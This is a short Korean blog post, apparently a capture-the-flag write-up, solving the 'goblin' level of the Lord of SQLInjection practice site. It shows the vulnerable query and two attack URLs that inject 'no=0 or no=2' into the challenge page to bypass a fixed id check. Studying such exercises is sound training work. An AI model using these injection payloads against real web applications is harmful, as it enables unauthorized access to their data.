Study/CTF

Lord of SQLInjection: goblin

Clotilde 2025. 1. 21. 13:51

Problem

Solve

  • 기존 구문 → GET 방식, id = guest 고정
select id from prob_goblin where id='guest' and no={$_GET[no]}
  • 변경 구문
select id from prob_goblin where id='guest' and no=0 or no=2
  • 공격 구문
https://los.rubiya.kr/chall/goblin_e5afb87a6716708e3af46a849517afdc.php?no=0 or no=1

https://los.rubiya.kr/chall/goblin_e5afb87a6716708e3af46a849517afdc.php?no=0 or no=2

저작자표시 비영리 변경금지 (새창열림)